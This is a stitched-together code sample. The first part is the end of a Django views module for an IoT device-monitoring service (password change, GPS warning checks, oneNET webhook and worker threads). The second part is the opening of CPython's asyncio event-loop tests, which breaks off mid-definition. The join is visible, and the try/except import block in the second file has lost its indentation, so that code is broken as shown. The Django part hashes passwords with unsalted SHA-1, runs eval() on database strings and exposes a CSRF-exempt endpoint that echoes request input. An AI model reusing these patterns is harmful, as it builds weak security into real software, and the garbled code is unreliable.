                    Operation.objects.create(code=103, user=user_obj)
                    return HttpResponse('666')
            else:
                return redirect('/home/' + request.session.get('USERNAME') + '/center')
        else:
            return redirect('/home/' + request.session.get('USERNAME') + '/center')
    else:
        return redirect('/')
def passwordChange(request, username):
    """POST endpoint: change the current user's password.

    Verifies the old password (SHA-1 digest comparison), stores the new
    digest, logs the operation, then invalidates the session so the user
    must log in again and records a Login 'OUT' row. Responds '666' on
    success, '777' when the old password is wrong.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                old_pwd = request.POST.get('o_password')
                new_pwd = request.POST.get('password')
                # Verify the old password before changing anything
                if user_obj.password == hashlib.sha1(old_pwd.encode(encoding='utf8')).hexdigest():
                    # Store the new password digest
                    user_obj.password = hashlib.sha1(new_pwd.encode(encoding='utf8')).hexdigest()
                    user_obj.save()
                    # BUGFIX: the operation was recorded twice (two identical
                    # Operation code=103 rows per change) — log it once.
                    Operation.objects.create(code=103, user=user_obj)
                    # Invalidate the session so the user must log in again
                    del request.session['USERNAME']
                    del request.session['DOMAIN_ID']
                    request.session['IS_LOGIN'] = False
                    Login.objects.create(user=user_obj, operation='OUT', IP=request.META['REMOTE_ADDR'])
                    return HttpResponse('666')
                else:
                    return HttpResponse('777')
            else:
                return redirect('/home/' + request.session.get('USERNAME') + '/center')
        else:
            return redirect('/home/' + request.session.get('USERNAME') + '/center')
    else:
        return redirect('/')
def waringDevice(user_obj):
    """Collect every device of the user's systems that has waring==1 data.

    Returns a pair (systems, devices), aligned index-by-index: the system of
    each flagged device and the flagged device itself.
    """
    all_devices = []
    for sys_obj in user_obj.system.all():
        all_devices.extend(sys_obj.device.all())
    flagged_systems = []
    flagged_devices = []
    for dev in all_devices:
        # A non-empty queryset of warning data marks the device as flagged.
        if dev.data.filter(waring=1):
            flagged_systems.append(dev.system)
            flagged_devices.append(dev)
    return flagged_systems, flagged_devices
def getwaring(request):
    """AJAX GET endpoint: 'yes' if any of the user's devices has warning data,
    'no' otherwise; redirects to '/' when not logged in or not GET."""
    if request.method == 'GET':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            # Resolve the session user.
            user_obj = \
                Users.objects.filter(username=request.session.get('USERNAME'),
                                     domain_id=request.session.get('DOMAIN_ID'))[
                    0]
            waring_system_list, waring_device_list = waringDevice(user_obj)
            # Bug fix: the original tested `waring_device_list or
            # waring_device_list` (same operand twice); check both lists.
            if waring_system_list or waring_device_list:
                return HttpResponse('yes')
            else:
                return HttpResponse('no')
        else:
            return redirect('/')
    else:
        return redirect('/')
# auth_data functions: per-platform checks that decide whether a sample is a
# warning; each also patches zero GPS coordinates in place.
def jinger(device, data):
    # Most recent non-warning (waring not in {0, 1}) normal-mode sample.
    data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
    if data_list:
        # NOTE(review): eval() on a DB-stored string -- safe only if the
        # field always holds a trusted dict literal; ast.literal_eval would
        # be safer.  TODO confirm.
        pre_data = eval(data_list[0].data)
        if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
            # No GPS fix: reuse the previous sample's coordinates (mutates
            # `data` in place) and fall back to the Turn flag.
            data['Lon'] = pre_data['Lon']
            data['Lat'] = pre_data['Lat']
            if data['Turn']:
                return True
            return False
        # Warn when the position moved more than ~0.001 degrees on either axis.
        elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
                abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
            return True
        else:
            return False
    elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
        # No history and no fix: substitute the hard-coded default location.
        data['Lon'] = '119.4655'
        data['Lat'] = '32.19605'
        if data['Turn']:
            return True
        return False
    else:
        # No history but a valid fix: the Turn flag alone decides.
        if data['Turn']:
            return True
        return False
def detritus(device, data):
    """Warning check for 'detritus' (waste-bin) devices: same movement logic as
    jinger() but keyed on the 'Full' flag instead of 'Turn'."""
    data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
    if data_list:
        # NOTE(review): eval() on a DB-stored string -- see jinger(); assumes
        # a trusted dict literal.
        pre_data = eval(data_list[0].data)
        if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
            # No GPS fix: reuse previous coordinates (mutates `data`).
            data['Lon'] = pre_data['Lon']
            data['Lat'] = pre_data['Lat']
            if data['Full']:
                return True
            return False
        # Movement beyond ~0.001 degrees is a warning.
        elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
                abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
            return True
        else:
            return False
    elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
        # No history and no fix: default location, then the Full flag decides.
        data['Lon'] = '119.4655'
        data['Lat'] = '32.19605'
        if data['Full']:
            return True
        return False
    else:
        if data['Full']:
            return True
        return False
def parquer(device, data):
    """Warning check for 'parquer' devices: warns only on movement; no flag."""
    data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
    if data_list:
        # NOTE(review): eval() on a DB-stored string -- see jinger().
        pre_data = eval(data_list[0].data)
        if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
            # No GPS fix: reuse previous coordinates, never a warning.
            data['Lon'] = pre_data['Lon']
            data['Lat'] = pre_data['Lat']
            return False
        elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
                abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
            return True
        else:
            return False
    else:
        if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
            data['Lon'] = '119.4655'
            data['Lat'] = '32.19605'
            return False
        # NOTE(review): no history + valid fix falls off the end and returns
        # None (falsy).  Probably intended to `return False` explicitly.
def lumiere(device, data):
    """Warning check for 'lumiere' (street-light) devices: movement plus
    light-state consistency against dawn/dusk time windows."""
    data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
    if data_list:
        # NOTE(review): eval() on a DB-stored string -- see jinger().
        pre_data = eval(data_list[0].data)
        if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
            # No fix: reuse previous coordinates, continue to the light checks.
            data['Lon'] = pre_data['Lon']
            data['Lat'] = pre_data['Lat']
        elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
                abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
            return True
    elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
        data['Lon'] = '119.4655'
        data['Lat'] = '32.19605'
    # NOTE(review): `not A or not B` is True unless A and B hold
    # simultaneously, which these two state combinations never can -- so this
    # branch always returns True and the else below looks unreachable.
    # Probably intended `not (A or B)`.  Also note the inconsistent key casing
    # 'Bottom-light' vs the documented template key 'Bottom-Light' -- confirm
    # against the actual payload.
    if not (data['Top-Light'] == 1 and data['Bottom-light'] == 1 and data['Switch-Light'] == 0) or not (
            data['Top-Light'] == 0 and data['Bottom-light'] == 1 and data['Switch-Light'] == 1):
        return True
    else:
        if data['Top-Light'] == 1 and data['Bottom-light'] == 1 and data['Switch-Light'] == 0:
            # Light off in the early-morning window (05:30-07:20) is a warning.
            # NOTE(review): format '%Y-%m-%d%H:%M' has no separator before the
            # hour; it happens to parse '...-015:30' -- fragile, confirm.
            start_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '5:30', '%Y-%m-%d%H:%M')
            end_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '7:20', '%Y-%m-%d%H:%M')
            now_time = datetime.datetime.now()
            if (now_time > start_time) and (now_time < end_time):
                return True
        else:
            # Otherwise warn during the evening window (17:45-19:15).
            start_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '17:45', '%Y-%m-%d%H:%M')
            end_time = datetime.datetime.strptime(str(datetime.datetime.now().date()) + '19:15', '%Y-%m-%d%H:%M')
            now_time = datetime.datetime.now()
            if (now_time > start_time) and (now_time < end_time):
                return True
    return False
def others(device, data):
    """Fallback warning check for unrecognised platforms: movement only."""
    data_list = device.data.filter(~Q(waring=0) & ~Q(waring=1), model=0).order_by('-id')
    if data_list:
        # NOTE(review): eval() on a DB-stored string -- see jinger().
        pre_data = eval(data_list[0].data)
        if (int(data['Lon']) == 0 and int(data['Lat']) == 0):
            # No GPS fix: reuse previous coordinates, never a warning.
            data['Lon'] = pre_data['Lon']
            data['Lat'] = pre_data['Lat']
            return False
        elif (abs(float(pre_data['Lon']) - float(data['Lon'])) > 0.001) or (
                abs(float(pre_data['Lat']) - float(data['Lat'])) > 0.001):
            return True
        else:
            return False
    elif (int(data['Lon']) == 0 and int(data['Lat']) == 0):
        # No history and no fix: substitute default location.
        data['Lon'] = '119.4655'
        data['Lat'] = '32.19605'
        return False
    else:
        return False
# Message queue shared between the webhook views and the worker threads.
# (Name shadows the stdlib `queue` module within this file.)
queue = Queue()
# oneNET data-normalisation helper follows.  Payload template:
# {'Lon': longitude, 'Lat': latitude, 'Switch': device state, 'Cycle': subscription period, 'Switch-Light': street-light state, 'Top-Light': ambient-light state, 'Bottom-Light': illumination state}
def dataSort(device, data):
    """Normalise `data` to the key set declared by the device's system type.

    The system's `type` field stores a dict literal whose keys define both
    which fields are kept and their order.  Returns str() of the filtered dict.
    """
    # NOTE(review): eval() on a DB-stored string -- ast.literal_eval would be
    # safer if the field is always a plain literal.
    template_keys = eval(device.system.type).keys()
    return str({key: data[key] for key in template_keys})
# oneNET data-processing worker.
def onenetHandle(queue):
    """Worker loop: for each queued message, authenticate the device, run the
    platform-specific warning check, and persist the normalised sample."""
    while True:
        data = queue.get()
        # authDevice yields (platform, device) on success, (False, None) otherwise.
        system_platform, device_obj = authDevice(data['sys_code'], data['IMEI'])
        if system_platform:
            # Dispatch to the module-level check function named after the
            # platform (jinger/detritus/parquer/lumiere/others) via a name
            # lookup instead of building a string for eval() -- same
            # behaviour, no code-injection surface.
            auth_func = globals()[system_platform.lower()]
            is_waring = auth_func(device_obj, data['data'])
            new_data = dataSort(device_obj, data['data'])
            if is_waring:
                Data.objects.create(device=device_obj, model=0, data=new_data, waring=1)
            else:
                Data.objects.create(device=device_obj, model=0, data=new_data)
def authDevice(sys_code, IMEI):
    """Look up a device by IMEI and verify its system code.

    Returns (platform, device) on success and (False, None) on failure.  The
    original returned a bare False on failure, which crashed the caller's
    tuple unpacking in onenetHandle (TypeError, killing the worker thread).
    """
    # Single query via first() instead of evaluating the queryset twice.
    device_obj = Device.objects.filter(IMEI=IMEI).first()
    if device_obj is not None and device_obj.system.devicecode == sys_code:
        return device_obj.system.platform, device_obj
    return False, None
# Spin up a small pool of worker threads to drain the oneNET queue.
threads = [Thread(target=onenetHandle, args=(queue,)) for _ in range(4)]
for worker in threads:  # iterate directly instead of indexing range(len(...))
    worker.start()
# The blocking queue lets the HTTP handlers hand work off asynchronously.
@csrf_exempt
def onenetDataIn(request):
    """oneNET push endpoint.

    GET echoes the `msg` query parameter (platform URL verification); POST
    enqueues the message's `value` payload for the worker threads.  Always
    returns a response -- the original could fall through and return None
    for POST bodies without a 'value' key, a Django error.
    """
    if request.method == 'GET':
        return HttpResponse(request.GET['msg'])
    msg = json.loads(request.body)['msg']
    if 'value' in msg:
        queue.put(msg['value'])
    return HttpResponse("123")
# oneNET debugging endpoint.
@csrf_exempt
def onenetDataTest(request):
    """Debug twin of onenetDataIn: prints the payload instead of queueing it."""
    if request.method == 'GET':
        return HttpResponse(request.GET['msg'])
    msg = json.loads(request.body)['msg']
    print(type(msg), msg)
    if 'value' in msg.keys():
        data = msg['value']
        print(type(data), data)
    return HttpResponse("123")
|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import types
import errno
import unittest
from unittest import mock
import weakref
if sys.platform not in ('win32', 'vxworks'):
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import socket_helper
from test.support import threading_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
    """Reset the global event loop policy once this module's tests finish."""
    asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
    """Return True if the platform is Mac OS 10.4 or older."""
    plat = sys.platform
    if plat.startswith("aix"):
        return True
    if plat != 'darwin':
        return False
    # On macOS, compare the numeric OS version against 10.5.
    mac_version = tuple(int(part) for part in platform.mac_ver()[0].split('.'))
    return mac_version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
    """Duck-typed coroutine stand-in: send/throw/close/__await__ are no-ops."""

    def send(self, v):
        """Ignore the sent value."""

    def throw(self, *exc):
        """Ignore the thrown exception."""

    def close(self):
        """Nothing to release."""

    def __await__(self):
        """Deliberately returns None (not an iterator)."""
class MyBaseProto(asyncio.Protocol):
    """Test protocol tracking its lifecycle (INITIAL -> CONNECTED -> [EOF] ->
    CLOSED) and counting received bytes; optional futures signal connect/close."""
    connected = None
    done = None
    def __init__(self, loop=None):
        self.transport = None
        self.state = 'INITIAL'
        self.nbytes = 0
        if loop is not None:
            # Resolved by connection_made / connection_lost for awaiting tests.
            self.connected = loop.create_future()
            self.done = loop.create_future()
    def _assert_state(self, *expected):
        if self.state in expected:
            return
        raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
    def connection_made(self, transport):
        self.transport = transport
        self._assert_state('INITIAL')
        self.state = 'CONNECTED'
        if self.connected:
            self.connected.set_result(None)
    def data_received(self, data):
        self._assert_state('CONNECTED')
        self.nbytes = self.nbytes + len(data)
    def eof_received(self):
        self._assert_state('CONNECTED')
        self.state = 'EOF'
    def connection_lost(self, exc):
        self._assert_state('CONNECTED', 'EOF')
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyProto(MyBaseProto):
    """MyBaseProto that immediately issues an HTTP/1.0 GET on connect."""
    def connection_made(self, transport):
        super().connection_made(transport)
        # Generate traffic so the test server has something to answer.
        transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
    """Datagram protocol tracking INITIAL -> INITIALIZED -> CLOSED plus a byte
    count; an optional future signals teardown."""
    done = None
    def __init__(self, loop=None):
        self.state = 'INITIAL'
        self.nbytes = 0
        if loop is not None:
            self.done = loop.create_future()
    def _assert_state(self, expected):
        if self.state == expected:
            return
        raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
    def connection_made(self, transport):
        self.transport = transport
        self._assert_state('INITIAL')
        self.state = 'INITIALIZED'
    def datagram_received(self, data, addr):
        self._assert_state('INITIALIZED')
        self.nbytes = self.nbytes + len(data)
    def error_received(self, exc):
        self._assert_state('INITIALIZED')
    def connection_lost(self, exc):
        self._assert_state('INITIALIZED')
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
    """Protocol for the read end of a pipe.  The lifecycle is kept as a
    growing *list* of states so a missed EOF before close can be tolerated."""
    done = None
    def __init__(self, loop=None):
        self.state = ['INITIAL']
        self.nbytes = 0
        self.transport = None
        if loop is not None:
            self.done = loop.create_future()
    def _assert_state(self, expected):
        if self.state == expected:
            return
        raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
    def connection_made(self, transport):
        self.transport = transport
        self._assert_state(['INITIAL'])
        self.state.append('CONNECTED')
    def data_received(self, data):
        self._assert_state(['INITIAL', 'CONNECTED'])
        self.nbytes = self.nbytes + len(data)
    def eof_received(self):
        self._assert_state(['INITIAL', 'CONNECTED'])
        self.state.append('EOF')
    def connection_lost(self, exc):
        if 'EOF' not in self.state:
            self.state.append('EOF')  # It is okay if EOF is missed.
        self._assert_state(['INITIAL', 'CONNECTED', 'EOF'])
        self.state.append('CLOSED')
        if self.done:
            self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
    """Protocol for the write end of a pipe: INITIAL -> CONNECTED -> CLOSED."""
    done = None
    def __init__(self, loop=None):
        self.state = 'INITIAL'
        self.transport = None
        if loop is not None:
            self.done = loop.create_future()
    def _assert_state(self, expected):
        if self.state == expected:
            return
        raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
    def connection_made(self, transport):
        self.transport = transport
        self._assert_state('INITIAL')
        self.state = 'CONNECTED'
    def connection_lost(self, exc):
        self._assert_state('CONNECTED')
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
    """Subprocess protocol that buffers pipe output and exposes futures/events
    for connect, per-fd disconnect, data arrival and process exit."""
    def __init__(self, loop):
        self.state = 'INITIAL'
        self.transport = None
        self.returncode = None
        # Futures the tests await.
        self.connected = loop.create_future()
        self.completed = loop.create_future()
        self.disconnects = {fd: loop.create_future() for fd in (0, 1, 2)}
        # Output buffers and arrival events keyed by fd (1=stdout, 2=stderr).
        self.data = {1: b'', 2: b''}
        self.got_data = {1: asyncio.Event(), 2: asyncio.Event()}
    def _assert_state(self, expected):
        if self.state == expected:
            return
        raise AssertionError(f'state: {self.state!r}, expected: {expected!r}')
    def connection_made(self, transport):
        self.transport = transport
        self._assert_state('INITIAL')
        self.state = 'CONNECTED'
        self.connected.set_result(None)
    def connection_lost(self, exc):
        self._assert_state('CONNECTED')
        self.state = 'CLOSED'
        self.completed.set_result(None)
    def pipe_data_received(self, fd, data):
        self._assert_state('CONNECTED')
        self.data[fd] += data
        self.got_data[fd].set()
    def pipe_connection_lost(self, fd, exc):
        self._assert_state('CONNECTED')
        if exc:
            self.disconnects[fd].set_exception(exc)
        else:
            self.disconnects[fd].set_result(exc)
    def process_exited(self):
        self._assert_state('CONNECTED')
        self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
    # Create a fresh event loop per test and install it via the test harness.
    def setUp(self):
        super().setUp()
        self.loop = self.create_event_loop()
        self.set_event_loop(self.loop)
    # Drain pending callbacks (e.g. transport close) before tearing down.
    def tearDown(self):
        # just in case if we have transport close callbacks
        if not self.loop.is_closed():
            test_utils.run_briefly(self.loop)
        self.doCleanups()
        support.gc_collect()
        super().tearDown()
    # run_until_complete must refuse re-entrancy from inside a running loop.
    def test_run_until_complete_nesting(self):
        async def coro1():
            await asyncio.sleep(0)
        async def coro2():
            self.assertTrue(self.loop.is_running())
            self.loop.run_until_complete(coro1())
        with self.assertWarnsRegex(
            RuntimeWarning,
            r"coroutine \S+ was never awaited"
        ):
            self.assertRaises(
                RuntimeError, self.loop.run_until_complete, coro2())
    # Note: because of the default Windows timing granularity of
    # 15.6 msec, we use fairly long sleep times here (~100 msec).
    # sleep(0.1) should take roughly that much wall-clock time.
    def test_run_until_complete(self):
        t0 = self.loop.time()
        self.loop.run_until_complete(asyncio.sleep(0.1))
        t1 = self.loop.time()
        self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
    # Stopping the loop before the coroutine finishes raises RuntimeError.
    def test_run_until_complete_stopped(self):
        async def cb():
            self.loop.stop()
            await asyncio.sleep(0.1)
        task = cb()
        self.assertRaises(RuntimeError,
                          self.loop.run_until_complete, task)
    # call_later schedules a one-shot callback after the given delay.
    def test_call_later(self):
        results = []
        def callback(arg):
            results.append(arg)
            self.loop.stop()
        self.loop.call_later(0.1, callback, 'hello world')
        self.loop.run_forever()
        self.assertEqual(results, ['hello world'])
    # call_soon runs the callback with its positional args next iteration.
    def test_call_soon(self):
        results = []
        def callback(arg1, arg2):
            results.append((arg1, arg2))
            self.loop.stop()
        self.loop.call_soon(callback, 'hello', 'world')
        self.loop.run_forever()
        self.assertEqual(results, [('hello', 'world')])
    # call_soon_threadsafe from another thread; the lock handshake makes the
    # thread's callback land before the loop-local one.
    def test_call_soon_threadsafe(self):
        results = []
        lock = threading.Lock()
        def callback(arg):
            results.append(arg)
            if len(results) >= 2:
                self.loop.stop()
        def run_in_thread():
            self.loop.call_soon_threadsafe(callback, 'hello')
            lock.release()
        lock.acquire()
        t = threading.Thread(target=run_in_thread)
        t.start()
        with lock:
            self.loop.call_soon(callback, 'world')
            self.loop.run_forever()
        t.join()
        self.assertEqual(results, ['hello', 'world'])
    # call_soon_threadsafe is also valid from the loop's own thread.
    def test_call_soon_threadsafe_same_thread(self):
        results = []
        def callback(arg):
            results.append(arg)
            if len(results) >= 2:
                self.loop.stop()
        self.loop.call_soon_threadsafe(callback, 'hello')
        self.loop.call_soon(callback, 'world')
        self.loop.run_forever()
        self.assertEqual(results, ['hello', 'world'])
    # The executor result should come back from a different (worker) thread.
    def test_run_in_executor(self):
        def run(arg):
            return (arg, threading.get_ident())
        f2 = self.loop.run_in_executor(None, run, 'yo')
        res, thread_id = self.loop.run_until_complete(f2)
        self.assertEqual(res, 'yo')
        self.assertNotEqual(thread_id, threading.get_ident())
    # After cancelling an executor future and closing the loop, no completion
    # callback may be scheduled on the (patched) loop.
    def test_run_in_executor_cancel(self):
        called = False
        def patched_call_soon(*args):
            nonlocal called
            called = True
        def run():
            time.sleep(0.05)
        f2 = self.loop.run_in_executor(None, run)
        f2.cancel()
        self.loop.run_until_complete(
            self.loop.shutdown_default_executor())
        self.loop.close()
        self.loop.call_soon = patched_call_soon
        self.loop.call_soon_threadsafe = patched_call_soon
        time.sleep(0.4)
        self.assertFalse(called)
    # add_reader callbacks receive readiness events until remove_reader.
    def test_reader_callback(self):
        r, w = socket.socketpair()
        r.setblocking(False)
        bytes_read = bytearray()
        def reader():
            try:
                data = r.recv(1024)
            except BlockingIOError:
                # Spurious readiness notifications are possible
                # at least on Linux -- see man select.
                return
            if data:
                bytes_read.extend(data)
            else:
                self.assertTrue(self.loop.remove_reader(r.fileno()))
                r.close()
        self.loop.add_reader(r.fileno(), reader)
        self.loop.call_soon(w.send, b'abc')
        test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
        self.loop.call_soon(w.send, b'def')
        test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
        self.loop.call_soon(w.close)
        self.loop.call_soon(self.loop.stop)
        self.loop.run_forever()
        self.assertEqual(bytes_read, b'abcdef')
    # add_writer fires when the socket is writable; remove_writer returns
    # True only while a writer is actually installed.
    def test_writer_callback(self):
        r, w = socket.socketpair()
        w.setblocking(False)
        def writer(data):
            w.send(data)
            self.loop.stop()
        data = b'x' * 1024
        self.loop.add_writer(w.fileno(), writer, data)
        self.loop.run_forever()
        self.assertTrue(self.loop.remove_writer(w.fileno()))
        self.assertFalse(self.loop.remove_writer(w.fileno()))
        w.close()
        read = r.recv(len(data) * 2)
        r.close()
        self.assertEqual(read, data)
    @unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
    # Validate argument checking, then install/trigger/remove a SIGINT handler.
    def test_add_signal_handler(self):
        caught = 0
        def my_handler():
            nonlocal caught
            caught += 1
        # Check error behavior first.
        self.assertRaises(
            TypeError, self.loop.add_signal_handler, 'boom', my_handler)
        self.assertRaises(
            TypeError, self.loop.remove_signal_handler, 'boom')
        self.assertRaises(
            ValueError, self.loop.add_signal_handler, signal.NSIG+1,
            my_handler)
        self.assertRaises(
            ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
        self.assertRaises(
            ValueError, self.loop.add_signal_handler, 0, my_handler)
        self.assertRaises(
            ValueError, self.loop.remove_signal_handler, 0)
        self.assertRaises(
            ValueError, self.loop.add_signal_handler, -1, my_handler)
        self.assertRaises(
            ValueError, self.loop.remove_signal_handler, -1)
        self.assertRaises(
            RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
            my_handler)
        # Removing SIGKILL doesn't raise, since we don't call signal().
        self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
        # Now set a handler and handle it.
        self.loop.add_signal_handler(signal.SIGINT, my_handler)
        os.kill(os.getpid(), signal.SIGINT)
        test_utils.run_until(self.loop, lambda: caught)
        # Removing it should restore the default handler.
        self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
        self.assertEqual(signal.getsignal(signal.SIGINT),
                         signal.default_int_handler)
        # Removing again returns False.
        self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
    @unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
    @unittest.skipUnless(hasattr(signal, 'setitimer'),
                         'need signal.setitimer()')
    def test_signal_handling_while_selecting(self):
        # Test with a signal actually arriving during a select() call.
        caught = 0
        def my_handler():
            nonlocal caught
            caught += 1
            self.loop.stop()
        self.loop.add_signal_handler(signal.SIGALRM, my_handler)
        signal.setitimer(signal.ITIMER_REAL, 0.01, 0)  # Send SIGALRM once.
        self.loop.call_later(60, self.loop.stop)
        self.loop.run_forever()
        self.assertEqual(caught, 1)
    @unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
    @unittest.skipUnless(hasattr(signal, 'setitimer'),
                         'need signal.setitimer()')
    # Extra positional args given to add_signal_handler reach the handler.
    def test_signal_handling_args(self):
        some_args = (42,)
        caught = 0
        def my_handler(*args):
            nonlocal caught
            caught += 1
            self.assertEqual(args, some_args)
            self.loop.stop()
        self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
        signal.setitimer(signal.ITIMER_REAL, 0.1, 0)  # Send SIGALRM once.
        self.loop.call_later(60, self.loop.stop)
        self.loop.run_forever()
        self.assertEqual(caught, 1)
    # Shared body: verify transport/protocol wiring for a finished connection.
    def _basetest_create_connection(self, connection_fut, check_sockname=True):
        tr, pr = self.loop.run_until_complete(connection_fut)
        self.assertIsInstance(tr, asyncio.Transport)
        self.assertIsInstance(pr, asyncio.Protocol)
        self.assertIs(pr.transport, tr)
        if check_sockname:
            self.assertIsNotNone(tr.get_extra_info('sockname'))
        self.loop.run_until_complete(pr.done)
        self.assertGreater(pr.nbytes, 0)
        tr.close()
    # TCP connection against the helper HTTP test server.
    def test_create_connection(self):
        with test_utils.run_test_server() as httpd:
            conn_fut = self.loop.create_connection(
                lambda: MyProto(loop=self.loop), *httpd.address)
            self._basetest_create_connection(conn_fut)
    @socket_helper.skip_unless_bind_unix_socket
    def test_create_unix_connection(self):
        # Issue #20682: On Mac OS X Tiger, getsockname() returns a
        # zero-length address for UNIX socket.
        check_sockname = not broken_unix_getsockname()
        with test_utils.run_test_unix_server() as httpd:
            conn_fut = self.loop.create_unix_connection(
                lambda: MyProto(loop=self.loop), httpd.address)
            self._basetest_create_connection(conn_fut, check_sockname)
    # Assert the SSL transport exposes the expected extra_info keys.
    # NOTE(review): mutable default `peercert={}` -- harmless here since it is
    # only read, but a None sentinel would be the safer idiom.
    def check_ssl_extra_info(self, client, check_sockname=True,
                             peername=None, peercert={}):
        if check_sockname:
            self.assertIsNotNone(client.get_extra_info('sockname'))
        if peername:
            self.assertEqual(peername,
                             client.get_extra_info('peername'))
        else:
            self.assertIsNotNone(client.get_extra_info('peername'))
        self.assertEqual(peercert,
                         client.get_extra_info('peercert'))
        # test SSL cipher
        cipher = client.get_extra_info('cipher')
        self.assertIsInstance(cipher, tuple)
        self.assertEqual(len(cipher), 3, cipher)
        self.assertIsInstance(cipher[0], str)
        self.assertIsInstance(cipher[1], str)
        self.assertIsInstance(cipher[2], int)
        # test SSL object
        sslobj = client.get_extra_info('ssl_object')
        self.assertIsNotNone(sslobj)
        self.assertEqual(sslobj.compression(),
                         client.get_extra_info('compression'))
        self.assertEqual(sslobj.cipher(),
                         client.get_extra_info('cipher'))
        self.assertEqual(sslobj.getpeercert(),
                         client.get_extra_info('peercert'))
        self.assertEqual(sslobj.compression(),
                         client.get_extra_info('compression'))
    # Shared body for SSL connections: transport must be an SSL flavour.
    def _basetest_create_ssl_connection(self, connection_fut,
                                        check_sockname=True,
                                        peername=None):
        tr, pr = self.loop.run_until_complete(connection_fut)
        self.assertIsInstance(tr, asyncio.Transport)
        self.assertIsInstance(pr, asyncio.Protocol)
        self.assertTrue('ssl' in tr.__class__.__name__.lower())
        self.check_ssl_extra_info(tr, check_sockname, peername)
        self.loop.run_until_complete(pr.done)
        self.assertGreater(pr.nbytes, 0)
        tr.close()
    # Runs the connection three ways: dummy context, ssl=True with a patched
    # default context, and ssl=True with real cert validation (must fail).
    def _test_create_ssl_connection(self, httpd, create_connection,
                                    check_sockname=True, peername=None):
        conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
        self._basetest_create_ssl_connection(conn_fut, check_sockname,
                                             peername)
        # ssl.Purpose was introduced in Python 3.4
        if hasattr(ssl, 'Purpose'):
            def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
                                          cafile=None, capath=None,
                                          cadata=None):
                """
                A ssl.create_default_context() replacement that doesn't enable
                cert validation.
                """
                self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
                return test_utils.dummy_ssl_context()
            # With ssl=True, ssl.create_default_context() should be called
            with mock.patch('ssl.create_default_context',
                            side_effect=_dummy_ssl_create_context) as m:
                conn_fut = create_connection(ssl=True)
                self._basetest_create_ssl_connection(conn_fut, check_sockname,
                                                     peername)
                self.assertEqual(m.call_count, 1)
        # With the real ssl.create_default_context(), certificate
        # validation will fail
        with self.assertRaises(ssl.SSLError) as cm:
            conn_fut = create_connection(ssl=True)
            # Ignore the "SSL handshake failed" log in debug mode
            with test_utils.disable_logger():
                self._basetest_create_ssl_connection(conn_fut, check_sockname,
                                                     peername)
        self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
    @unittest.skipIf(ssl is None, 'No ssl module')
    # SSL over TCP against the helper test server.
    def test_create_ssl_connection(self):
